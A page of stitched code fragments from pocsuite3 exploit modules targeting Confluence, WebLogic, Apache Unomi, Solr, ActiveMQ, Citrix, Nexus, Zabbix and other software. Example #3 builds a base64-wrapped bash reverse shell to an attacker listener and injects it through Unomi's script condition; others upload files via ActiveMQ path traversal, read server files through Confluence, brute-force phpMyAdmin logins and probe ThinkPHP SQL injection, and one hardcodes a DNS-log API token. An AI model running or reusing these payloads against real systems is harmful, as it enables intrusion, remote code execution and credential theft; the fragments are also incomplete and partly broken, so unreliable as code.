コード例 #1
        target_url = vul_url

        if self.is_vulnerable():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)


    def is_vulnerable(self):
        """Placeholder vulnerability check.

        NOTE(review): this stub unconditionally returns True, so _verify()
        reports every target as vulnerable. Do not trust this PoC's output
        until a real check replaces the TODO.
        """
        # TODO: implement the actual detection logic
        vulnerable = True
        return vulnerable

    # Attack module
    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()


    # Output report
    def save_output(self, result):
        """Wrap *result* in the framework Output: success with the dict when non-empty, plain fail otherwise."""
        output = Output(self)
        if not result:
            output.fail()
            return output
        output.success(result)
        return output

# Register the PoC classes with the framework loader (one class per Confluence issue);
# the 3394 registration is commented out.
register_poc(Confluence_3396_POC)
register_poc(Confluence_3398_POC)
#register_poc(Confluence_3394_POC)
コード例 #2
            'Cookie': "sidebar_collapsed=false",
            'Connection': "close",
            'Upgrade-Insecure-Requests': "1",
            'Content-Type': "text/xml",
            'Content-Length': "1001",
            'cache-control': "no-cache"
        }
        try:
            requests.post(veri_url, data=payload, headers=headers)
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if cmd in res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.warn(str(e))
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output
    
# Register the PoC class with the framework loader.
register_poc(WebLogicWlsAsyncRCE)
コード例 #3
        PORT = get_listener_port()
        # IP = yourlistenerip
        # PORT = yourlistenerport
        payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
        payload = 'bash -c {echo,' + (base64.b64encode(
            payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
        pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
        try:
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  #执行ping指令
        except Exception as e:
            logger.warn(str(e))

        return self.parse_attack(result)

    # Custom output helper: wraps the result in the framework's Output instance
    def parse_attack(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail("not vulnerability")
            return output
        output.success(result)
        return output

    # Register the PoC class so the framework can discover and load it.


register_poc(ApacheUnomiCVE202013942POC1)
コード例 #4
                result['VerifyInfo']['URL'] = url
                #result['VerifyInfo']['POC'] = path
        except Exception as e:
            return
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_attack(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output

    def _shell(self):
        """Shell mode is not implemented for this PoC; always returns None."""
        return None

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(testPOC)
コード例 #5
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['body'] = data
        except Exception as e:
            return
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_attack(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output

    def _shell(self):
        """Shell mode is not implemented for this PoC; always returns None."""
        return None

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(POC)
コード例 #6
ファイル: zabbix_bypass.py プロジェクト: 5l1v3r1/pocs-1
        }
        return headers

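    def _verify(self):
        """Probe the Zabbix dashboard page without credentials.

        Requests ``/zabbix/zabbix.php?action=dashboard.view&dashboardid=1``
        (the original stored this path as a hex-escaped literal; the plain
        literal below is the same string at runtime) and treats the word
        'Dashboard' in the body as a sign that the authentication bypass worked.

        Returns:
            The framework Output from parse_output(); on success it carries the
            target URL and the request path under 'VerifyInfo'.
        """
        result = {}
        payload = '/zabbix/zabbix.php?action=dashboard.view&dashboardid=1'
        try:
            target = self._get_url + payload
            # Bounded wait so an unresponsive host cannot stall the whole scan.
            response = requests.get(url=target, headers=self._headers, timeout=10)
            # NOTE(review): a substring match with no status-code check is a weak
            # signal (a login or error page could also contain 'Dashboard');
            # confirm hits manually.
            if 'Dashboard' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)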

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('Not vulnerability')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(Zabbix)
コード例 #7
ファイル: Solr_poc.py プロジェクト: kaisaryousuf/Poc-1
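    def test_dnslog(self, url):
        """Poll the DNS-log API at *url* and report whether self.BANNER was seen.

        The response is expected to be JSON shaped like ``{"data": [{"name": ...}]}``.
        Any request, JSON or key/index error yields False instead of raising, and
        the function now always returns a bool (the original fell through to None
        when the banner was absent, and let non-JSON bodies raise).
        """
        try:
            resp = req.get(url)
            d = resp.json()
            name = d['data'][0]['name']
            return self.BANNER in name
        except Exception:
            return False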


    # Attack module
    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Wrap *result* in the framework Output: success with the dict when non-empty, plain fail otherwise."""
        output = Output(self)
        if not result:
            output.fail()
            return output
        output.success(result)
        return output


# Register the four Solr PoC classes with the framework loader.
register_poc(Solr_RCE_0193)
register_poc(Solr_RCE_0192)
register_poc(Solr_RCE_17558)
register_poc(Solr_RCE_12409)
コード例 #8
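    def test_dnslog(self, url):
        """Poll the DNS-log API at *url* and report whether self.BANNER was seen.

        The response is expected to be JSON shaped like ``{"data": [{"domain": ...}]}``.
        Any request, JSON or key/index error yields False instead of raising, and
        the function now always returns a bool (the original fell through to None
        when the banner was absent, and let non-JSON bodies raise).
        """
        try:
            resp = req.get(url)
            d = resp.json()
            sub_domain = d['data'][0]['domain']
            return self.BANNER in sub_domain
        except Exception:
            return False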

    def test_command(self, p_output):
        # 分别对应echo命令(Windows)的回显和id命令(*nix)的回显
        return re.search(self.BANNER, p_output) or "uid=" in p_output

    # Attack module
    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Wrap *result* in the framework Output: success with the dict when non-empty, plain fail otherwise."""
        output = Output(self)
        if not result:
            output.fail()
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(Solr_RCE_12409)
コード例 #9
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        }

        response = requests.get(url=vuln_url, headers=headers)
        if response.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in response.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['Path'] = vuln_url
            return self.parse_output(result)
        else:
            return self.parse_output()

    def _verify(self):
        """Verify mode delegates to the single check routine POC_1()."""
        check = self.POC_1
        return check()

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses POC_1()."""
        check = self.POC_1
        return check()

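    def parse_output(self, result=None):
        """Build the framework Output from *result*.

        Args:
            result: verification dict; None or an empty dict means "not
                vulnerable". The original used a mutable default (``{}``),
                which is shared across calls; None is used instead and the
                redundant ``len(result.keys()) != 0`` test is folded into the
                truthiness check.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output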


# Register the PoC class with the framework loader.
register_poc(DemoPoc)
コード例 #10
    # Framework metadata. Both strings misspell "Unauthorized"; left untouched
    # because they are runtime values, not comments.
    vulType = 'Unauthrized Access'
    desc = '''
    Docker Remote API Unauthrized Access
    '''

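    def _verify(self):
        """Check for an unauthenticated Docker Remote API by fetching ``/info``.

        An HTTP 200 with a non-empty body is taken as a hit; the URL is reported
        as both 'URL' and 'Payload' (as in the original).

        NOTE(review): any web server answering 200 on /info would match too.
        Requiring the body to parse as JSON with Docker-specific keys would cut
        false positives; not changed here because the expected schema is not
        visible in this file.
        """
        result = {}
        try:
            url = self.url + "/info"
            # Bounded wait so a silent host does not hang the scan.
            res = requests.get(url, timeout=10)
            if res.status_code == 200 and res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = url
        except Exception as e:
            logger.info(e)
        return self.parse_ouput(result)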

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_ouput(self, result):
        """Build the framework Output (name keeps the original's misspelling; callers use it)."""
        output = Output(self)
        if not result:
            output.fail('not docker vulnerability')
            return output
        output.success(result)
        return output

# Register the PoC class with the framework loader.
register_poc(Docker)
            t = resq.text
            t = t.replace('\n', '').replace('\r', '')
            print('output >>> ' + t)
            t = t.replace(" ", "")
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Name'] = t
        except Exception as e:
            return

    def parse_attack(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output

    def _shell(self):
        """Shell mode is not implemented for this PoC; always returns None."""
        return None

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output
    
# Register the PoC class with the framework loader.
register_poc(rj_get_token)
        try:
            resq = requests.get(url=url+payload)
            t = resq.text 
            t = t.replace('\n', 't').replace('\r', '')
            print('输出文件内容 >>> '+t)
            t = t.replace(" ","")
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Name'] = t
        except Exception as e:
            return
    def parse_attack(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output

    def _shell(self):
        """Shell mode is not implemented for this PoC; always returns None."""
        return None

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output
# Register the PoC class with the framework loader.
register_poc(OpenSNSPOC)
コード例 #13
        try:
            r2 = requests.post(url=pocurl,
                               headers=headers,
                               data=pocxml,
                               verify=False)
            if r2.status_code == 200 and 'XML-RPC' in r2.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['extra'] = {}
                result['extra']['evidence'] = r2.text
        except Exception as e:
            logger.warn(str(e))
        return self.parse_attack(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def _shell(self):
        """Shell mode has no separate implementation; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_attack(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail("not vulnerability")
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(ApacheOFBizCVE20209496POC)
コード例 #14
            content = re.search(r'server_cond=[\S\s]+?[\S\s]"', t).group()
            print('output >>> ' + content)
            t = t.replace(" ", "")
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Name'] = t
        except Exception as e:
            return

    def parse_attack(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output

    def _shell(self):
        """Shell mode is not implemented for this PoC; always returns None."""
        return None

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(ZhongQingPOC)
コード例 #15
            filename = self.random_str(6)
            flag = "PUT /fileserver/sex../../..\\styles/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nbig04dream\r\n\r\n" % (
                filename)
            s.send(flag.encode())
            s.recv(1024)
            s.close()
            url = 'http://' + ip + ":" + str(
                port) + '/styles/%s.txt' % (filename)
            res_html = requests.get(url).text
            if 'big04dream' in res_html:
                result["VerifyInfo"] = {}
                result['VerifyInfo']['IP'] = ip
                result['VerifyInfo']['Payload'] = flag
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('not activemq vulnerability')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(ActiveMQ)
コード例 #16
ファイル: zonetransfers.py プロジェクト: zer0yu/Open-PoC
        # if zonetransfers:
        #     print("\tZone transfers possible:")
        #     for zone in zonetransfers:
        #         print(zone)

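    def _verify(self):
        """Check whether the target's DNS zone allows a zone transfer (AXFR).

        The hostname is taken from self.url via urlparse. If the URL carries no
        hostname the check is skipped and an empty result is returned (the
        original formatted None into the string 'None' and probed that). When
        dns_zonetransfer() returns something truthy the hostname is reported
        under VerifyInfo/URL.
        """
        result = {}
        hostname = urlparse(self.url).hostname
        if not hostname:
            return self.parse_output(result)
        if self.dns_zonetransfer(hostname):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = hostname
        return self.parse_output(result)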

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('not vulnerability')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(DNSPOC)
コード例 #17
        # print(url)

        try:
            res = self.safe_atk(base_url, True)
            # print(res)
            if res['chapsecrets'][0] == "OK":
                f = open("/tmp/res.json", 'a+')
                json.dump(res, f, indent=4, ensure_ascii=False)
                f.close()
                logger.info("Result saved in res.json")
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = base_url
                result['VerifyInfo']['SavePath'] = "/tmp/res.json"
        except Exception as ex:
            logger.error(str(ex))
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(VigorPOC)
コード例 #18
ファイル: phpmyadmin_burst.py プロジェクト: zer0yu/Open-PoC
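    def _verify(self):
        """Try each username/password pair from get_word_list() against phpMyAdmin.

        Stops at the first pair that pma_login() accepts and reports it under
        VerifyInfo. The original kept iterating after a hit, which both hammered
        the target needlessly (account-lockout risk on a brute-force module) and
        let a later valid pair silently overwrite the reported one. Credentials
        are stripped of surrounding whitespace before use and in the report.
        Errors are logged and yield an empty (fail) result.
        """
        result = {}
        url = self.url
        try:
            for username, password in self.get_word_list():
                user = username.strip()
                pwd = password.strip()
                if self.pma_login(url, user, pwd):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Username'] = user
                    result['VerifyInfo']['Password'] = pwd
                    break
        except Exception as ex:
            logger.error(str(ex))
        return self.parse_output(result)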

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(PmaBurstPOC)
コード例 #19
ファイル: check_http_status.py プロジェクト: zer0yu/Open-PoC
    # Framework category constant for this PoC (a generic HTTP protocol check).
    category = POC_CATEGORY.PROTOCOL.HTTP

    def _verify(self):
        """Record the HTTP status of self.url; anything other than 404 counts as a hit.

        TLS verification is disabled and the request times out after 5 s; a
        request error is logged and produces an empty (fail) result.
        """
        result = {}
        url = self.url
        try:
            resp = requests.get(url, verify=False, timeout=5)
        except Exception as ex:
            logger.error(str(ex))
            return self.parse_output(result)
        if resp.status_code != 404:
            result['VerifyInfo'] = {'URL': url, 'PoC': str(resp.status_code)}
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(HTTPXPOC)
コード例 #20
ファイル: openssl_heartbleed.py プロジェクト: 5l1v3r1/pocs-1
                break
        local_socket.send(self.malformed_heartbeat)
        return self.send_n_catch_heartbeat(local_socket)

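    def _verify(self):
        """Check the target for the OpenSSL Heartbleed bug.

        Host and port come from self.url (port defaults to 443 when the URL
        has none). The original split the URL on '//' and always used 443, so
        a URL with an explicit port or a path handed check_heardbeat() a
        'host:port/path' string and the wrong port. A URL without a hostname
        is reported as an error and yields an empty (fail) result.
        """
        from urllib.parse import urlparse

        result = {}
        try:
            parsed = urlparse(self.url)
            host = parsed.hostname
            if not host:
                raise ValueError('no hostname in %r' % self.url)
            port = parsed.port or 443
            if self.check_heardbeat(host=host.encode(), port=port):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = host
                result['VerifyInfo']['INFO'] = 'target %s vulnerability' % host
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)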

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('not heartbleed vulnerability')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(HeartBleed)
コード例 #21
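    def _verify(self):
        """Check whether the WebLogic ws_utc settings endpoint is reachable.

        The path is appended to self.url with exactly one joining slash and any
        status other than 404 is reported as a hit.

        NOTE(review): '!= 404' also accepts 401, 403 and 5xx; an unauthenticated
        access claim should at least require a 200 (and ideally a body check).
        Left as is because the expected response is not visible in this file —
        confirm hits manually.
        """
        result = {}
        payload = 'ws_utc/resources/setting/options/general'
        try:
            base = self.url if self.url.endswith('/') else self.url + '/'
            url = base + payload
            # Bounded wait so an unresponsive host does not stall the scan.
            response = requests.get(url=url, headers=self._headers, timeout=10)
            if response.status_code != 404:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)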

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(Weblogic)
コード例 #22
            cmd2 = 'ping ' + cmd
            if self.upload_xml(cmd):
                xml_url = self.url + '/vpn/../vpns/portal/%s.xml' % 'bigdream'
                headers = {"NSC_USER": "******", "NSC_NONCE": "nsroot"}
                r = requests.get(xml_url, headers=headers, verify=False)
                if r.status_code == 200:
                    res = requests.get(
                        'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
                    )
                    if cmd in res:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = self.url
                        result['VerifyInfo']['Payload'] = cmd2
        except Exception as e:
            pass
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('not vulnerability')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(Citrix)
コード例 #23
        return _l_auth_headers



    # Verify that the EL expression was evaluated
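    def test_EL(self, p_resp):
        """Return True if the EL result (str(self.ran_sum)) appears in the 'roles' error field.

        Parsing the JSON body and the nested ``result.errors.roles`` lookup are
        inside the try, so a non-JSON body or a missing key yields False instead
        of raising (the original only guarded the final containment test and fell
        through to None when the value was absent). The field is logged on success.
        """
        try:
            d = p_resp.json()
            roles = d['result']['errors']['roles']
            found = str(self.ran_sum) in roles
        except Exception:
            return False
        logger.info(roles)
        return found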


    # Attack module
    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Wrap *result* in the framework Output: success with the dict when non-empty, plain fail otherwise."""
        output = Output(self)
        if not result:
            output.fail()
            return output
        output.success(result)
        return output

# Register the PoC class with the framework loader.
register_poc(Nexus3_2020_10204_EL_INJECTION_POC)
コード例 #24
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        """Request headers for the Nexus JSON API calls (JSON body, AJAX marker, no caching)."""
        user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0"
        return {
            'User-Agent': user_agent,
            'Accept': "*/*",
            'Content-Type': "application/json",
            'X-Requested-With': "XMLHttpRequest",
            'Connection': "close",
            'Cache-Control': "no-cache",
        }

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('not vulnerability')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(Nexus)
コード例 #25
ファイル: Think_SQL.py プロジェクト: rouze-d/pocsuite3-pocs
			match_string = "Unknown column 'watch_dog' in 'field list'"
			if url_parse.query:
					qs = parse_qs(url_parse.query)
					for i in qs:
							query_list = []
							query_list.append(i+'[]'+'='+'bind'+'&'+i+'[]'+'='+payload)
							for a in qs:
									if a == i:
											continue
									query_list.append(a+'='+qs[a][0])
							query = '&'.join(query_list)
							url = url_parse.scheme+'://'+url_parse.netloc+url_parse.path+url_parse.params+'?'+query

							try:
								req = requests.get(url)
								if match_string in req.text:
										print(req.text)
										print("success")
							except Exception as e:
								pass


						
	def _attack(self):
		"""Attack mode has no separate exploit path; it reuses the verify routine."""
		verify = self._verify
		return verify()
	

# Register the PoC class with the framework loader.
register_poc(Testpoc)
			

コード例 #26
    # Framework metadata for the PHP-FPM / nginx RCE PoC (CVE-2019-11043).
    appPowerLink = ''
    appName = 'php-fpm and nginx'
    appVersion = 'all'
    vulType = 'rce'
    desc = ''' 
    PHP-fpm 远程代码执行漏洞(CVE-2019-11043)
    '''
    # NOTE(review): both lists hold a single empty string rather than being
    # empty; whether the framework treats '' as "none" is not visible here.
    samples = ['']
    install_requires = ['']

    def _verify(self):
        """Run the PhpUip probe against <url>/index.php and report self.url on success."""
        result = {}
        probe = PhpUip(self.url + '/index.php')
        if probe.poc():
            result['VerifyInfo'] = {'URL': self.url}
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('Not vulnerability')
            return output
        output.success(result)
        return output

# Register the PoC class with the framework loader.
register_poc(PHPFPM)
コード例 #27
            "Referer": self.url +
            "/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
            "Content-Type": "application/json; charset=utf-8"
        }
        data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
        r = requests.post(paylaod, data=data, headers=headers)

        if r.status_code == 200 and "</web-app>" in r.text:
            m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
            if m:
                content = m.group()[:limitSize]
                result['FileInfo'] = {}
                result['FileInfo']['Filename'] = filename
                result['FileInfo']['Content'] = content

        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(DemoPOC)
コード例 #28
                str_resp_json = str(resp.json())

                # 响应头为200 且json响应字符串包含columns和user,则认为查询成功
                if resp.status_code == 200 and 'columns' in str_resp_json and 'user' in str_resp_json:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    return self.save_output(result)

                return self.save_output(result)
        except Exception as e:
            print(e)
            traceback.print_stack()

        return self.save_output(result)

    # Exploit mode
    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def save_output(self, result):
        """Wrap *result* in the framework Output: success with the dict when non-empty, plain fail otherwise."""
        # Decide between success and fail purely on whether a result was collected.
        output = Output(self)
        if not result:
            output.fail()
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(InfluxDB_POC)
コード例 #29
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [7001, 17001, 27001]
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            status, msg = check(pr.hostname, port)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = uri
                result['extra'] = {}
                result['extra']['evidence'] = msg
                break

        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    def parse_output(self, result):
        """Build the framework Output: success carrying *result* when it is non-empty, else a fail message."""
        output = Output(self)
        if not result:
            output.fail('not vulnerability')
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(TestPOC)
コード例 #30
ファイル: CVE-2018-16621.py プロジェクト: kaisaryousuf/Poc-1
        headers = {'Authorization': 'Basic' + ' ' + auth}
        return headers

    # Verify that the EL expression was evaluated
    def test_EL(self, p_resp):
        d = p_resp.json()
        result = d['result']['errors']['roles']
        print(result)
        print(self.ran_sum)
        try:
            if str(self.ran_sum) in result:
                return True
        except Exception:
            return False

    # Attack module
    def _attack(self):
        """Attack mode has no separate exploit path; it reuses the verify routine."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Wrap *result* in the framework Output: success with the dict when non-empty, plain fail otherwise."""
        output = Output(self)
        if not result:
            output.fail()
            return output
        output.success(result)
        return output


# Register the PoC class with the framework loader.
register_poc(Nexus3_2018_16621_EL_INJECTION_POC)